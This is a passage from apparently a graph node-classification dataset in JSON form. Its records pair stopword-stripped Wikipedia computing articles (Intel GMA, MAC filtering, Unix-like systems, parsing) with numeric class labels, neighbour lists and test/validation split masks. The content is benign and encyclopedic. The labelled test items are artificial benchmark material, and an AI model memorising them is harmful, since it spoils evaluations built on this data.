since many games need pixel shader 2.0 higher supported hardware vertex shader 2.0 software-emulated games crysis start frame rates acceptable l vertex shaders 3.0 supported intel newest 15.6 drivers windows vista september 2 2007 xp support vs3 l introduced august 10 2007 intel announced march 2007 beta drivers would available june 2007 june 1 2007 pre-beta early beta drivers released windows xp vista beta drivers vista xp released june 19 since hardware l vertex shading enabled drivers individual applications forced fall back software rendering raises performance compatibility certain cases selection based testing intel preselected driver .inf file intel released production version drivers 32-bit 64-bit windows vista enable aero graphics intel introduced directx 10 x3100 x3500 gpus vista 15.9 drivers 2008 though release dx10 drivers x3000 uncertain wddm 1.1 supported x3100 dxva-hd opengl 2.0 support available since vista 15.11 drivers xp 14.36 drivers windows 8 ships driver x3100 september 2010 latest available driver revisions intel website windows xp vista 7 performance functionality gma processors limited attaining performance low-cost discrete gpus best old directx 6 gpus riva tnt2 worst thus 're sometimes even dubbed graphics media decelerators though actual performance depended cpu well ram amount speed example atom n450 cpu gma 3150 perform comparably riva tnt2 pc tualatin pentium 3 even worse gpu sometimes even underclocked hindering already poor performance even features games 3d applications may unsupported gmas particularly older ones gma x3x00 unified shader design allows complete hardware functionality line still issues games significantly limited performance intel put page 'known issues solutions version intel graphics media accelerator software development concerns integrated graphics software development forum review conducted april 2007 tech report determined gma x3000 performance comparable nvidia geforce 6150 review gma x3000 unable run pc games battlefield 2 however extremetech review found games n't graphically demanding sims 2 civilization iv look good gma x3000 used run reviews performed tech report extremetech anandtech concluded amd radeon x1250 integrated graphics solutions based amd 690g chipset better choice gma x3000 based g965 chipset especially considering 3d gaming performance price review performed register hardware december 2007 author leo waldock argued gma x3500 capable running pc game requires directx 10 addition directx 10 support gma x3500 irrelevant review gma x3500 used run crysis f.e.a.r extraction point able render 4 14 frames per second respectively game end review concluded overall x3500 made minimal advances gma x3000 review published may 2008 gma x4500 showed superior game performance lowest-end 1-year-older geforce 8400m graphics card cpu-bound tests losing still low-end geforce 8400m gs slower cpu",
    "neighbors": [
      3459,
      5380,
      3973,
      8325,
      9095,
      9611,
      4108,
      7309,
      9612,
      9741,
      5649,
      5523,
      6804,
      8851,
      4886,
      9111,
      3352,
      10646,
      799,
      10658,
      5503,
      4011,
      10669,
      9391,
      5681,
      8625,
      4276,
      1461,
      6069,
      10548,
      6972,
      2237,
      5309,
      6339,
      5444,
      1998,
      2638,
      5073,
      4178,
      6911,
      10971,
      7134,
      1119,
      5606,
      7911,
      1000,
      7657,
      1770,
      1515,
      4204,
      4717,
      5356,
      5871,
      7151,
      8684,
      11247,
      499,
      8820,
      2165,
      3317,
      4217,
      7290,
      5883,
      2943
    ],
    "mask": "None"
  },
  {
    "node_id": 5387,
    "label": 5,
    "text": "MAC_filtering:mac filtering computer networking mac filtering refers security access control method whereby mac address assigned network card used determine access network mac addresses uniquely assigned card using mac filtering network permits denies network access specific devices use blacklists whitelists restriction network access use lists straightforward individual person identified mac address rather device authorized person need whitelist entry device would use access network giving network additional protection mac filtering circumvented using packet analyzer find valid mac using mac spoofing access network using address mac address filtering considered security obscurity effectiveness based secrecy implementation components many devices support mac filtering device basis whitelisted mac addresses allowed port device blacklisted mac addresses blocked ports devices cisco catalyst switches support mac filtering port-by-port basis referred port security port security may configured statically list dynamically based first given number addresses detected combination two methods port security configured default settings allow one mac address per port shut port allowed number addresses exceeded mac filtering also used enterprise wireless networks multiple access points prevent clients communicating access point configured allows clients talk default gateway wireless clients",
    "neighbors": [
      9440,
      8386,
      2884,
      9640,
      10442,
      2737,
      7411,
      1814,
      7865,
      2430,
      5407
    ],
    "mask": "Test"
  },
  {
    "node_id": 5388,
    "label": 2,
    "text": "The_Sims_FreePlay:sims freeplay sims freeplay strategic life simulation game developed ea mobile later firemonkeys studios free version sims mobile devices released ios december 15 2011 released android february 15 2012 released blackberry 10 july 31 2013 released windows phone 8 september 12 2013 game released fire os october 2012 sims freeplay players build design houses customize create maximum 100 virtual people called sims players control sims satisfy wishes let complete different kinds actions gain simoleons lifestyle points social points three currencies game game runs real-time takes real time complete actions actions must instructed players unlike windows version sims degree autonomy players progress 55 levels unlock content furniture sims ’ houses purchased virtual currencies previously mentioned families sims children provided one one adult limit amount allowable couples due limit people player town however player buys items online store become vip allow increase number sims town game quests players required complete well optional quests discovery quests may choose pursue sims must bake cake age completion certain quota discovery quests make cake takes 24 hours costs 5 lifestyle points three styles currency simoleons gained completing actions baking/cooking gardening sending sims work lifestyle ponts gained completing hobby collections tasks social points gained completing social tasks rewarded 1-2 social points game detail sims 4 sims mobile choices sim customization limited unless bought real currency time complete actions takes realistic times complete actions take 3 days game regularly updated new content many events competitions announced freeplay official facebook page updates commonly include elements various expansion packs stuff packs main series april 2017 windows phones longer receive updates game june 2018 pregnancy baby showers added game said fans requested feature added game ever since freeplay launched update sims marry option given add baby family october 15 2018 augmented reality multiplayer added july 2019 autosave function available",
    "neighbors": [
      1571,
      1599
    ],
    "mask": "None"
  },
  {
    "node_id": 5389,
    "label": 4,
    "text": "Hardware_security:hardware security hardware security discipline originated cryptographic engineering involves hardware design access control secure multi-party computation secure key storage ensuring code authenticity measures ensure supply chain built product secure among things hardware security module hsm physical computing device safeguards manages digital keys strong authentication provides cryptoprocessing modules traditionally come form plug-in card external device attaches directly computer network server hardware backdoors backdoors hardware conceptionally related hardware trojan ht malicious modification electronic system particularly context integrated circuit physical unclonable function puf physical entity embodied physical structure easy evaluate hard predict individual puf device must easy make practically impossible duplicate even given exact manufacturing process produced respect hardware analog one-way function name physical unclonable function might little misleading pufs clonable pufs noisy therefore achieve requirements function today pufs usually implemented integrated circuits typically used applications high security requirements many attacks sensitive data resources reported organizations occur within organization",
    "neighbors": [
      10851,
      6020,
      4965,
      3178,
      107,
      1709,
      3886,
      7024,
      2737,
      2932,
      8343,
      7354,
      91,
      3262,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5390,
    "label": 3,
    "text": "SLOB:slob slob simple list blocks allocator one three available memory allocators linux kernel two slab slub slob allocator designed require little memory implementation housekeeping use small systems embedded systems unfortunately major limitation slob allocator suffers greatly internal fragmentation slob currently uses first-fit algorithm uses first available space memory 2008 reply linus torvalds linux mailing list made suggested use best-fit algorithm tries find memory block suits needs best best fit finds smallest space fits required amount available avoiding loss performance fragmentation consolidation memory default linux kernel used slab allocation system version 2.6.23 slub allocation became default config_slab flag disabled kernel falls back using slob allocator slob allocator used dslinux nintendo ds handheld console",
    "neighbors": [
      2278,
      4871,
      6352,
      823,
      3512
    ],
    "mask": "Test"
  },
  {
    "node_id": 5391,
    "label": 6,
    "text": "BestCrypt:bestcrypt bestcrypt commercial disk encryption app windows linux os x developed jetico inc oy bestcrypt comes two editions volume encryption edition encrypts entire disk volumes container encryption edition encrypts virtual disks stored computer files also provides complimentary data erasure utility bcwipe bestcrypt supports wide variety block cipher algorithms including aes serpent blowfish twofish des triple des gost 28147-89 ciphers support cbc lrw modes operation aes twofish serpent also support xts mode",
    "neighbors": [
      2050,
      10631,
      4746,
      8331,
      2193,
      7983,
      8115,
      3382,
      823,
      7229,
      8640,
      9281,
      7244,
      8283,
      8674,
      7139,
      11368,
      3572,
      5749
    ],
    "mask": "Test"
  },
  {
    "node_id": 5392,
    "label": 4,
    "text": "Sean_Hastings:sean hastings sean hastings born 1969 entrepreneur cypherpunk author security expert best known founding ceo havenco world first formal data 1997 hastings worked cryptographic protocols tools free u.s. cryptographic export restrictions vincent cate started international conference financial cryptography anguilla year hastings founded havenco 2000 originally incorporating country residence anguilla second incorporation channel islands hastings ceo co-founders included ryan lackey sameer parekh immediately following public launch havenco subject great deal press coverage including hastings appearance along several cofounders royal family sealand cover wired july 2000 issue company entirely nationalised government sealand 2002 commercial failure mounting tensions 2002 hastings began work seasteading patri friedman project aimed building floating communities free restrictions current governments collaboration continued 2009 including talk hastings seasteading institute annual conference hastings cofounder eric s. raymond green-span open source infrastructure trust reputation management begun march 2009 hastings also author paul rosenberg book god wants dead vera verba 2007 takes look lighter side atheism anarchy",
    "neighbors": [
      9404
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5393,
    "label": 3,
    "text": "Live_Partition_Mobility:live partition mobility live partition mobility chargeable live migration feature ibm power6 power7 power8 power9 servers available since 2007 allows running lpar relocated one system another concept similar vmware vmotion live partition mobility component powervm enterprise edition hardware feature provides ability move aix ibm linux logical partitions one system another mobility process transfers system environment includes processor state memory attached virtual devices connected users source target systems must access network sans need type requirement use power6 power7 power8 processors partitions relocated must fully virtualized i.e dedicated i/o adapters although possible use multi-pathing software fail virtual adapters duration move sized partition moved essentially memory copied asynchronously one system another create clone running partition dirty pages re-copied necessary threshold reached i.e high percentage pages successfully copied across partition transitioned target machine remaining pages copied across synchronously agents carry memory copying nominated virtual i/o servers machine standard ethernet network used data transmission live partition mobility used avoid outages planned server maintenance load balancing across multiple servers energy conservation",
    "neighbors": [
      6153,
      10543,
      4017,
      1309,
      11613
    ],
    "mask": "None"
  },
  {
    "node_id": 5394,
    "label": 7,
    "text": "Polestar_Xeus:polestar xeus polestar xeus cloud computing software manufactured nkia corporation south korea used manage iaas solutions provides various functions required management cloud systems reporting sla usage amount particular users times management construction performance events statistics virtual machines storage networks resource use policy management features gui-based drag-and-drop workflow api connection cloud systems polestar xeus compatible iaas solutions including vmware vsphere microsoft hyper-v citrix xen red hat enterprise virtualization nkia provides polestar xeus south korea",
    "neighbors": [
      9655,
      4194,
      5371,
      9455
    ],
    "mask": "Test"
  },
  {
    "node_id": 5395,
    "label": 9,
    "text": "Interpreted_language:interpreted language interpreted language type programming language implementations execute instructions directly freely without previously compiling program machine-language instructions interpreter executes program directly translating statement sequence one subroutines another language often machine code terms interpreted language compiled language well defined theory programming language either interpreted compiled modern programming language implementation increasingly popular platform provide options interpreted languages also contrasted machine languages functionally execution interpretation mean thing — fetching next instruction/statement program executing although interpreted byte code additionally identical machine code form assembler representation term interpreted sometimes reserved software processed languages virtual machine emulator top native i.e hardware processor principle programs many languages may compiled interpreted emulated executed natively designation applied solely based common implementation practice rather representing essential property language many languages implemented using compilers interpreters including basic c lisp pascal java c compiled bytecode virtual-machine-friendly interpreted language lisp implementations freely mix interpreted compiled code distinction compiler interpreter always well defined many language processors combination early days computing language design heavily influenced decision use compiling interpreting mode execution example smalltalk 1980 designed interpreted run-time allows generic objects dynamically interact initially interpreted languages compiled line-by-line line compiled executed loop subroutine caused certain lines executed multiple times would recompiled every time become much less common so-called interpreted languages use intermediate representation combines compiling interpreting examples include intermediate representation compiled java time execution ruby time change source detected execution python interpreting language gives implementations additional flexibility compiled implementations features often easier implement interpreters compilers include furthermore source code read copied giving users freedom disadvantages interpreted languages several criteria used determine whether particular language likely called compiled interpreted users definitive compiled languages interpreter-like properties vice versa many languages first compiled bytecode ѕometimes bytecode also compiled native binary using aot compiler executed natively hardware processor",
    "neighbors": [
      9224,
      2062,
      4627,
      5651,
      3613,
      9245,
      5677,
      5680,
      7219,
      9780,
      1591,
      65,
      4674,
      10819,
      8262,
      5703,
      6753,
      2670,
      623,
      9330,
      9331,
      3705,
      9345,
      2691,
      3221,
      5783,
      7326,
      4770,
      4777,
      11442,
      692,
      191,
      9926,
      5833,
      1234,
      11488,
      7395,
      9454,
      10991,
      5361,
      6906,
      7421,
      6403,
      10510,
      5395,
      5412,
      805,
      5415,
      303,
      7486,
      3904,
      8524,
      2386,
      3413,
      10083,
      7524,
      6502,
      9575,
      8554,
      2925,
      3462,
      4486,
      8582,
      8079,
      5527,
      6556,
      7580,
      1952,
      8609,
      11683,
      7076,
      934,
      5031,
      1963,
      8628,
      5048,
      6074,
      6594,
      8644,
      8646,
      8647,
      10186,
      10703,
      2519,
      477,
      7646,
      4576,
      8171,
      5612,
      9714,
      3573,
      2556,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5396,
    "label": 8,
    "text": "MulticoreWare:multicoreware multicoreware inc software development company offering products services related hevc video compression ii machine learning specifically convolutional neural networks iii compilers heterogeneous computing iv software performance optimization multicoreware customers include amazon amd arm microsoft google telestream bbright technologies multicoreware founded 2009 today offices 3 countries – usa china india multicoreware placed 110 inc. 5000 list fastest growing private companies america year 2014 st. louis missouri based technology start-up accelerator iten listed company list top ten tech startups st. louis area three consecutive years 2012–2014 multicoreware ranked 22nd fastest growing private company silicon valley silicon valley business journal october 2014 july 2014 multicoreware named ee times silicon 60 list hot startups watch multicoreware inc. tie50 awards finalist tiecon2014 multicoreware leads development x265 hevc encoder x265 based x264 h.264/mpeg-4 avc encoder similar command-line syntax feature set x265 offered either gnu general public license gpl 2 license commercial license february 2014 telestream vantage transcode multiscreen became first commercial product introduce x265 encoding technology october 2015 video group moscow state university identified x265 highest overall efficiency i.e lowest bit rate target quality level first comparison hevc encoders lipsync tool automatically detects audio-video synchronization errors video using machine learning deep learning technologies errors detected without digital fingerprinting watermarking multicoreware offers uhdcode hevc video decoder api available x86 arm xbox 360 ps3 opencl accelerated supports hevc main/ main10 profiles march 2015 multicoreware launched x265 hevc upgrade includes x265 encoder application uhdcode directshow filter allowing hevc video playback 64-bit windows media player multicore cross platform architecture mxpa heterogeneous computing stack based llvm framework capable supporting opencl renderscript cuda c++ amp hcc open source parallel c++ compiler hsa opencl 1.2 hcc provides compiler frontends c++amp c++ source parallel stl openmp multicoreware one world ’ largest heterogeneous computing teams across globe offers accelerated software development services multicoreware contributor member khronos group active several standards full range services include",
    "neighbors": [
      1952,
      4321,
      1578,
      499,
      8921,
      6268
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5397,
    "label": 2,
    "text": "Unix-like:unix-like unix-like sometimes referred un*x *nix operating system one behaves manner similar unix system necessarily conforming certified version single unix specification unix-like application one behaves like corresponding unix command shell standard defining term difference opinion possible degree given operating system application unix-like term include free open-source operating systems inspired bell labs unix designed emulate features commercial proprietary work-alikes even versions based licensed unix source code may sufficiently unix-like pass certification bear unix trademark open group owns unix trademark administers single unix specification unix name used certification mark approve construction unix-like consider misuse trademark guidelines require unix presented uppercase otherwise distinguished surrounding text strongly encourage using branding adjective generic word system discourage use hyphenated phrases parties frequently treat unix genericized trademark add wildcard character name make abbreviation like un*x *nix since unix-like systems often unix-like names aix a/ux hp-ux irix linux minix ultrix xenix xinu xnu patterns literally match many system names still generally recognized refer unix descendant work-alike system even completely dissimilar names darwin/macos illumos/solaris freebsd 2007 wayne r. gray sued dispute status unix trademark lost case lost appeal court upholding trademark ownership unix-like systems started appear late 1970s early 1980s many proprietary versions idris 1978 unos 1982 coherent 1983 uniflex 1985 aimed provide businesses functionality available academic users unix allowed relatively inexpensive commercial binary sub-licensing unix 1979 variety proprietary systems developed based including aix hp-ux irix sunos tru64 ultrix xenix largely displaced proprietary clones growing incompatibility among systems led creation interoperability standards including posix single unix specification various free low-cost unrestricted substitutes unix emerged 1980s 1990s including 4.4bsd linux minix turn basis commercial unix-like systems bsd/os macos several versions mac os x/macos running intel-based mac computers certified single unix specification bsd variants descendants unix developed university california berkeley unix source code bell labs however bsd code base evolved since replacing code since bsd variants certified compliant single unix specification referred unix-like rather unix dennis ritchie one original creators unix expressed opinion unix-like systems linux de facto unix systems eric s. raymond rob landley suggested three kinds unix-like systems systems historical connection codebase commercial unix systems fall category bsd systems descendants work done university california berkeley late 1970s early 1980s systems original code still trace ancestry designs systemslargely commercial naturehave determined open group meet single unix specification allowed carry unix name systems commercial derivatives system v code base one form another although apple macos 10.5 later bsd variant certified systems ibm z/os earned trademark posix compatibility layer otherwise inherently unix systems many ancient unix systems longer meet definition broadly unix-like system behaves manner roughly consistent unix specification including program manages login command line sessions specifically refer systems linux minix behave similarly unix system genetic trademark connection code base free/open-source implementations unix design whether genetic unix fall restricted definition third category due expense obtaining open group certification costs thousands dollars commercial closed source systems around 2001 linux given opportunity get certification including free help posix chair andrew josey symbolic price one dollar activities make linux posix-compliant josey prepared list differences posix standard linux standard base specification august 2005 project shut missing interest lsb work group non-unix-like operating systems provide unix-like compatibility layer variable degrees unix-like functionality means windows-unix interoperability include",
    "neighbors": [
      8204,
      6158,
      4113,
      8209,
      8213,
      25,
      2081,
      6180,
      2085,
      8236,
      6189,
      6198,
      8248,
      2105,
      4153,
      59,
      2109,
      6207,
      10304,
      8260,
      69,
      2120,
      6218,
      2125,
      2132,
      4182,
      93,
      6238,
      10333,
      4192,
      97,
      6243,
      100,
      2149,
      10341,
      8295,
      4200,
      6248,
      8298,
      8301,
      8304,
      6257,
      8306,
      10352,
      2164,
      2168,
      4218,
      2172,
      8316,
      6273,
      2178,
      2179,
      132,
      10370,
      10376,
      142,
      2198,
      6295,
      6296,
      8344,
      10394,
      10397,
      8350,
      4255,
      10407,
      168,
      8369,
      10422,
      4279,
      10425,
      8378,
      6333,
      190,
      8388,
      2245,
      6342,
      10436,
      4296,
      6345,
      2253,
      8399,
      8404,
      2262,
      6358,
      6361,
      8410,
      6369,
      231,
      2281,
      6379,
      6380,
      10476,
      2287,
      2292,
      10484,
      8439,
      6393,
      8441,
      2301,
      4349,
      258,
      4355,
      10499,
      6412,
      8461,
      273,
      2321,
      2322,
      4369,
      8469,
      8476,
      10530,
      6436,
      6438,
      2345,
      6443,
      8491,
      6445,
      4398,
      8499,
      8504,
      2361,
      4409,
      6457,
      6459,
      10564,
      8517,
      2375,
      4423,
      10568,
      330,
      8522,
      4438,
      6491,
      348,
      10590,
      10592,
      2401,
      6498,
      8551,
      2409,
      8554,
      4459,
      10611,
      2424,
      4473,
      6523,
      10623,
      2432,
      6528,
      8582,
      394,
      4490,
      4493,
      4501,
      6550,
      10646,
      414,
      4514,
      421,
      6566,
      8631,
      6587,
      2494,
      451,
      8644,
      4550,
      6601,
      6606,
      463,
      10703,
      2513,
      4561,
      470,
      2521,
      6617,
      6620,
      6624,
      8675,
      8677,
      487,
      8679,
      10727,
      491,
      10732,
      495,
      2545,
      8697,
      506,
      8700,
      2560,
      6657,
      515,
      516,
      521,
      10761,
      6675,
      8725,
      4630,
      8727,
      10776,
      4637,
      543,
      551,
      561,
      10803,
      4661,
      10809,
      573,
      10813,
      576,
      4673,
      2630,
      8778,
      589,
      593,
      607,
      10851,
      6760,
      10860,
      10861,
      8816,
      633,
      2684,
      640,
      6787,
      2692,
      8837,
      10883,
      10891,
      652,
      6797,
      4750,
      8852,
      10900,
      8857,
      6812,
      6813,
      671,
      673,
      8867,
      4775,
      10920,
      2730,
      684,
      6828,
      8876,
      687,
      8877,
      8879,
      2741,
      4790,
      6837,
      700,
      701,
      708,
      2763,
      4815,
      10959,
      6866,
      4827,
      741,
      742,
      6890,
      4850,
      6898,
      2804,
      8954,
      2811,
      4859,
      2813,
      6910,
      8957,
      4865,
      11012,
      11013,
      11018,
      8975,
      8976,
      11023,
      787,
      788,
      789,
      6934,
      4887,
      8991,
      8995,
      4900,
      2853,
      11045,
      823,
      4919,
      6969,
      6970,
      829,
      9027,
      2884,
      11075,
      11079,
      842,
      6993,
      6997,
      863,
      865,
      2914,
      868,
      9063,
      4968,
      9064,
      11112,
      9067,
      4978,
      2931,
      7027,
      891,
      4989,
      4996,
      4998,
      5000,
      905,
      11145,
      11147,
      7053,
      7057,
      11153,
      926,
      2975,
      9119,
      929,
      2979,
      933,
      9125,
      5036,
      5037,
      11180,
      11184,
      2995,
      948,
      9141,
      9151,
      961,
      9153,
      965,
      3015,
      5067,
      975,
      5077,
      3030,
      5078,
      3034,
      7134,
      7136,
      3042,
      5093,
      5096,
      11246,
      1007,
      3055,
      11249,
      5106,
      9204,
      5109,
      3062,
      5110,
      3068,
      5117,
      11263,
      9218,
      11269,
      9222,
      3079,
      9223,
      11273,
      9229,
      9231,
      3089,
      7187,
      7188,
      7196,
      11293,
      11294,
      11297,
      7204,
      9253,
      1062,
      5158,
      7208,
      9257,
      11305,
      7217,
      1075,
      7224,
      3129,
      5177,
      5179,
      9276,
      11325,
      3137,
      5190,
      3147,
      7244,
      5199,
      7249,
      1107,
      1109,
      5206,
      3162,
      11363,
      9320,
      7279,
      7285,
      9335,
      1147,
      11388,
      3197,
      1150,
      7293,
      9342,
      5249,
      9343,
      5251,
      7300,
      5256,
      9353,
      7307,
      11403,
      9361,
      11410,
      3222,
      9366,
      9370,
      7325,
      7329,
      3235,
      5284,
      7332,
      3241,
      3245,
      5293,
      3248,
      11442,
      1208,
      7356,
      9407,
      1219,
      5316,
      1235,
      7379,
      7382,
      7384,
      7385,
      11481,
      5343,
      3297,
      9444,
      1253,
      9452,
      5357,
      11501,
      11506,
      5363,
      3321,
      5369,
      3324,
      9468,
      5374,
      7423,
      11517,
      3330,
      7435,
      9487,
      11539,
      7444,
      3349,
      1304,
      7450,
      3359,
      7460,
      1323,
      3378,
      9525,
      1336,
      7483,
      9533,
      3393,
      3395,
      11587,
      9542,
      3401,
      7497,
      5451,
      5457,
      11601,
      11603,
      3412,
      11608,
      5471,
      9567,
      1379,
      3429,
      5482,
      7534,
      11632,
      5492,
      3449,
      5500,
      7552,
      5506,
      11652,
      3465,
      1422,
      7566,
      1426,
      11667,
      11669,
      11673,
      3487,
      3488,
      1442,
      3491,
      9639,
      11689,
      9642,
      9643,
      1455,
      7603,
      5562,
      9671,
      7626,
      1485,
      1492,
      9687,
      9693,
      7646,
      9699,
      1508,
      1509,
      5612,
      5613,
      7666,
      3571,
      5619,
      1530,
      7682,
      5637,
      9733,
      9735,
      9743,
      7696,
      9747,
      5656,
      1561,
      3615,
      5663,
      3618,
      9762,
      1574,
      7728,
      9780,
      7733,
      9784,
      1593,
      1594,
      5694,
      9791,
      1605,
      3654,
      5703,
      5706,
      3659,
      1613,
      9807,
      7761,
      3667,
      5721,
      1632,
      3684,
      9829,
      5737,
      5742,
      9839,
      9843,
      5754,
      7804,
      5759,
      5760,
      1668,
      3717,
      9865,
      7836,
      9887,
      3744,
      1700,
      3750,
      3751,
      7847,
      7848,
      7849,
      9899,
      3758,
      7854,
      3760,
      9908,
      7861,
      5815,
      5819,
      9931,
      9932,
      1741,
      5840,
      3794,
      9939,
      7895,
      9944,
      9946,
      9948,
      9953,
      7907,
      5864,
      9964,
      7917,
      3828,
      9972,
      1782,
      7930,
      7933,
      1803,
      1804,
      9996,
      3856,
      1813,
      3865,
      10016,
      5923,
      7983,
      10033,
      7986,
      1844,
      10040,
      3903,
      1860,
      8005,
      5959,
      8012,
      3918,
      10062,
      5969,
      8020,
      5978,
      5985,
      8033,
      3939,
      5989,
      5990,
      1900,
      8063,
      8065,
      8067,
      3974,
      3975,
      3976,
      3978,
      10125,
      10127,
      1940,
      10138,
      6044,
      8092,
      4001,
      6049,
      10149,
      6055,
      10151,
      6058,
      8106,
      10156,
      8110,
      1971,
      8115,
      8119,
      6075,
      8124,
      6078,
      4032,
      10176,
      6085,
      4039,
      8136,
      2000,
      2001,
      8147,
      6100,
      4053,
      2010,
      6119,
      6120,
      4073,
      4076,
      6126,
      10222,
      6128,
      8177,
      2035,
      8180,
      4085,
      4089,
      6138,
      10235,
      2045,
      8191
    ],
    "mask": "None"
  },
  {
    "node_id": 5398,
    "label": 7,
    "text": "Salesforce_Tower:salesforce tower salesforce tower formerly known transbay tower office skyscraper south market district downtown san francisco located 415 mission street first fremont streets next transbay transit center site salesforce tower centerpiece san francisco transbay redevelopment plan plan contains mix office transportation retail residential uses upon completion 2018 became tallest skyscraper san francisco skyline top roof height overall height surpassing transamerica pyramid also second-tallest building west mississippi river wilshire grand center los angeles though salesforce tower taller wilshire grand center decorative spire excluded shorter roofline los angeles u.s. bank tower developer hines interests limited partnership proposal architect césar pelli pelli clarke pelli architects selected winner global competition 2007 entitle purchase site seven-member jury development experts assembled transbay joint powers authority tjpa selected hines proposals forest city enterprises architect richard rogers rockefeller development group corp. skidmore owings merrill 2012 boston properties acquired 50 stake project 2013 acquired hines remaining interest become 95 owners project site tower dilapidated area formerly used ground-level entrance san francisco transbay terminal demolished 2011 tjpa sold parcel boston properties hines us 192 million ceremonial groundbreaking new tower occurred march 27 2013 below-grade construction work starting late 2013 project joint venture general contractors clark construction hathaway dinwiddie construction footprint salesforce tower rests land fill near san francisco original waterfront area prone soil liquefaction earthquakes account seismic risk tower uses design modeled withstand strongest earthquakes expected region foundation includes 42 piles driven nearly bedrock thick foundation mat development originally contracted spec hines major tenant lease secured beforehand april 11 2014 salesforce.com announced signed lease become building anchor tenant previously known transbay tower building renamed salesforce tower lease valued us 560 million 15 half years starting 2017 tower opened 2018 61 floors decorative crown reaching original proposal called tower height later reduced building first tenants began moving january 8 2018 upon opening building 97 leased tenants including salesforce covington burling wework bain company accenture mcdermott emery hellman friedman 61st floor known ohana floor serves observation deck lounge salesforce employees guests made available use nonprofits evenings weekends transbay transit center located foot building february 5 2019 company announced opened advanced registration public tours ohana floor every month starting february 23 10 april 2019 council tall buildings urban habitat ctbuh named salesforce tower “ best tall building worldwide 2019 17th annual ctbuh international best tall building awards symposium ceremony dinner celebrated grand hyatt shenzhen shenzhen china",
    "neighbors": [
      8555,
      10090,
      1739
    ],
    "mask": "None"
  },
  {
    "node_id": 5399,
    "label": 9,
    "text": "Parsing:parsing parsing syntax analysis syntactic analysis process analysing string symbols either natural language computer languages data structures conforming rules formal grammar term parsing comes latin pars orationis meaning part speech term slightly different meanings different branches linguistics computer science traditional sentence parsing often performed method understanding exact meaning sentence word sometimes aid devices sentence diagrams usually emphasizes importance grammatical divisions subject predicate within computational linguistics term used refer formal analysis computer sentence string words constituents resulting parse tree showing syntactic relation may also contain semantic information term also used psycholinguistics describing language comprehension context parsing refers way human beings analyze sentence phrase spoken language text terms grammatical constituents identifying parts speech syntactic relations etc term especially common discussing linguistic cues help speakers interpret garden-path sentences within computer science term used analysis computer languages referring syntactic analysis input code component parts order facilitate writing compilers interpreters term may also used describe split separation traditional grammatical exercise parsing sometimes known clause analysis involves breaking text component parts speech explanation form function syntactic relationship part determined large part study language conjugations declensions quite intricate heavily inflected languages parse phrase 'man bites dog involves noting singular noun 'man subject sentence verb 'bites third person singular present tense verb 'to bite singular noun 'dog object sentence techniques sentence diagrams sometimes used indicate relation elements sentence parsing formerly central teaching grammar throughout english-speaking world widely regarded basic use understanding written language however general teaching techniques longer current machine translation natural language processing systems written texts human languages parsed computer programs human sentences easily parsed programs substantial ambiguity structure human language whose usage convey meaning semantics amongst potentially unlimited range possibilities germane particular case utterance man bites dog versus dog bites man definite one detail another language might appear man dog bites reliance larger context distinguish two possibilities indeed difference concern difficult prepare formal rules describe informal behaviour even though clear rules followed order parse natural language data researchers must first agree grammar used choice syntax affected linguistic computational concerns instance parsing systems use lexical functional grammar general parsing grammars type known np-complete head-driven phrase structure grammar another linguistic formalism popular parsing community research efforts focused less complex formalisms one used penn treebank shallow parsing aims find boundaries major constituents noun phrases another popular strategy avoiding linguistic controversy dependency grammar parsing modern parsers least partly statistical rely corpus training data already annotated parsed hand approach allows system gather information frequency various constructions occur specific contexts see machine learning approaches used include straightforward pcfgs probabilistic context-free grammars maximum entropy neural nets successful systems use lexical statistics consider identities words involved well part speech however systems vulnerable overfitting require kind smoothing effective parsing algorithms natural language rely grammar 'nice properties manually designed grammars programming languages mentioned earlier grammar formalisms difficult parse computationally general even desired structure context-free kind context-free approximation grammar used perform first pass algorithms use context-free grammars often rely variant cyk algorithm usually heuristic prune away unlikely analyses save time see chart parsing however systems trade speed accuracy using e.g. linear-time versions shift-reduce algorithm somewhat recent development parse reranking parser proposes large number analyses complex system selects best option semantic parsers convert texts representations meanings psycholinguistics parsing involves assignment words categories formation ontological insights evaluation meaning sentence according rules syntax drawn inferences made word sentence known connotation normally occurs words heard read consequently psycholinguistic models parsing necessity incremental meaning build interpretation sentence processed normally expressed terms partial syntactic structure creation initially wrong structures occurs interpreting garden path sentences discourse analysis examines ways analyze language use semiotic events persuasive language may called rhetoric parser software component takes input data frequently text builds data structure – often kind parse tree abstract syntax tree hierarchical structure giving structural representation input checking correct syntax parsing may preceded followed steps may combined single step parser often preceded separate lexical analyser creates tokens sequence input characters alternatively combined scannerless parsing parsers may programmed hand may automatically semi-automatically generated parser generator parsing complementary templating produces formatted output may applied different domains often appear together scanf/printf pair input front end parsing output back end code generation stages compiler input parser often text computer language may also text natural language less structured textual data case generally certain parts text extracted rather parse tree constructed parsers range simple functions scanf complex programs frontend c++ compiler html parser web browser important class simple parsing done using regular expressions group regular expressions defines regular language regular expression engine automatically generating parser language allowing pattern matching extraction text contexts regular expressions instead used prior parsing lexing step whose output used parser use parsers varies input case data languages parser often found file reading facility program reading html xml text examples markup languages case programming languages parser component compiler interpreter parses source code computer programming language create form internal representation parser key step compiler frontend programming languages tend specified terms deterministic context-free grammar fast efficient parsers written compilers parsing done one pass multiple passes – see one-pass compiler multi-pass compiler implied disadvantages one-pass compiler largely overcome adding fix-ups provision made code relocation forward pass fix-ups applied backwards current program segment recognized completed example fix-up mechanism would useful would forward goto statement target goto unknown program segment completed case application fix-up would delayed target goto recognized conversely backward goto require fix-up location already known context-free grammars limited extent express requirements language informally reason memory language limited grammar remember presence construct arbitrarily long input necessary language example name must declared may referenced powerful grammars express constraint however parsed efficiently thus common strategy create relaxed parser context-free grammar accepts superset desired language constructs accepts invalid constructs later unwanted constructs filtered semantic analysis contextual analysis step example python following syntactically valid code following code however syntactically valid terms context-free grammar yielding syntax tree structure previous syntactically invalid terms context-sensitive grammar requires variables initialized use rather analyzed parsing stage caught checking values syntax tree hence part semantic analysis context-sensitive syntax practice often easily analyzed semantics following example demonstrates common case parsing computer language two levels grammar lexical syntactic first stage token generation lexical analysis input character stream split meaningful symbols defined grammar regular expressions example calculator program would look input codice_1 split tokens codice_2 codice_3 codice_4 codice_5 codice_6 codice_7 codice_8 codice_9 codice_10 meaningful symbol context arithmetic expression lexer would contain rules tell characters codice_3 codice_6 codice_9 codice_4 codice_8 mark start new token meaningless tokens like codice_16 codice_17 generated next stage parsing syntactic analysis checking tokens form allowable expression usually done reference context-free grammar 